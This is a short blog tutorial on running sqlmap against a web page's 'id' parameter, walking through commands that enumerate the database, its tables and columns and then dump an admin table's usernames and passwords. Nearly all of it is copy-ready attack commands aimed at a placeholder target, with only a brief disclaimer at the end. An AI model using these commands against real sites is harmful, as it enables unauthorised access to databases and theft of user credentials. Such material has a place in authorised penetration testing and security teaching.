SQL injection through SQLMAP step by step

Sql injections attack

SQL Injection through SQLMAP

Hello Guy, Today I gonna show you a major vulnerability in web applications. There are many types of injection and in this a SQL Injection Comes also. SQL Injection is very vast keep learning even though I am also still learner so without wasting any time lets come to point.

SQL Injection

SQL Injection is a type of vulnerability in which an attacker can execute can some code and expose backend database or in simple words an attacker can dump your database.


SQL map is a command line interface tool use for exploiting SQL injection vulnerabilities it is a open source tool .

If you are using windows you can download SQL Map Here , However Kali has inbuilt SQLMAP

Lets start practicle…….

  • Launch SQLMAP

Now type Following command in terminal

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 –current-db

Sql injections attack

  • Now our SQL map started. It will take some couple of seconds to enumerate database
  • now we got the database as you can see the above image. our next step is to enumerate tables
  • Type the following command to enumerate tables follow me step by step. 🙂

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name –table

sql injection by sqlmap

as you can see in the below image we had successfully enumerate table names.

sql injections vulnerability

In the above Image you can see that sqlmap enumerated table name no we will have to find column. here i am finding columns fo admin.

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name –columns

again sqlmap is enumerating column name from the table admin.

Sql injections tutorial

Cool guys we had successfully enumerate the column name now our next step is to dump/enumerate the Username and password.

Follow me and use this command

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name -C column name –dump

sql injections

sql map started a enumerating database as you can see database enumerated.

Sql Injection

yeah, we got username and password.. 🙂 keep learning and practising but don’t harm any site…

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

Leave a Reply